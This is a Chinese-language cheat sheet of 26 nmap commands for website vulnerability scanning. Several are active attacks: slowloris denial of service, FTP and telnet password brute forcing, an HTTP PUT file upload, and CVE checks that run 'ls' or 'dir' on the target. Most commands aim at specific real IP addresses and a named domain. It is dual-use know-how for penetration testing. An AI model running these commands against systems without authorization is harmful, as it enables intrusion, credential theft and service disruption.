用nmap掃描網站漏洞的命令有:
1 http 拒絕服務
nmap –max-parallelism 800–script http-slowloris scanme.nmap.org
2.IIS 短文件泄露
nmap -p 8080 –script http-iis-short-name-brute 61.142.64.176
3.ftp弱口令暴力破解
nmap –script ftp-brute –script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153
4.檢測CVE-2011-2523中的ftp-vsftpd-backdoor
nmap -T2 –script ftp-vsftpd-backdoor 211.139.201.240
5.驗證http中開啟的-methods 方法
nmap -T3 –script http-methods –script-args http.test-all=true,http.url-path=/www.haoshangjia.com
6.驗證HTTP.sys 遠程代碼執行
nmap -sV –script http-vuln-cve2015-1635 203.195.139.153
7.驗證 SSL POODLE information leak
nmap -sV -p 443 –version-light –script ssl-poodle 218.19.141.16
8.驗證http 中開啟了put 方法
nmap –script http-put –script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16
9.驗證mysql 匿名訪問
nmap –script mysql-empty-password 203.195.139.153
10.驗證cve2015-1427 漏洞
nmap –script http-vuln-cve2015-1427 –script-args command=ls 203.195.139.153
11.驗證cve2014-8877漏洞
nmap -Pn –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128
12.驗證Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞
nmap -p 443 –script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153
13.驗證低安全的 SSHv1,sslv2協議
nmap –script sshv1,sslv2 www.haoshangjia.com
14.驗證CVE-2014-0224 ssl-ccs-injection
nmap -Pn –script ssl-ccs-injection 203.195.139.153
15.驗證ssl-cert證書問題
nmap -v -v –script ssl-cert 203.195.139.153
16.驗證SSL證書的有限期
nmap -Pn –script ssl-date www.haoshangjia.com
17.驗證CVE-2014-0160 OpenSSL Heartbleed bug
nmap -p 443 –script ssl-heartbleed,ssl-known-key 203.195.139.153
18.驗證 Debian OpenSSL keys
nmap -p 443 –script ssl-known-key 203.195.139.153
19.驗證弱加密SSL套件
nmap –script ssl-enum-ciphers 203.195.139.153
20.驗證CVE 2015-4000
nmap –script ssl-dh-params www.haoshangjia.com
21.驗證多種SSL漏洞問題
nmap 203.195.139.153 –vv –script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2
22.在網絡中檢測某主機是否存在竊聽他人流量
nmap –script sniffer-detect 10.10.167.5
23.暴力破解telnet
nmap -p 23 –script telnet-brute –script-args userdb=myusers.lst,passdb=mypwds.lst –script-args telnet-brute.timeout=8s 203.195.139.153
24.驗證telnet是否支持加密
nmap –script telnet-encryption 203.195.139.153
25.精準地確認端口上運行的服務
nmap -sV –script unusual-port 42.96.170.128
26.收集VNC信息
nmap –script vnc-info 203.195.139.153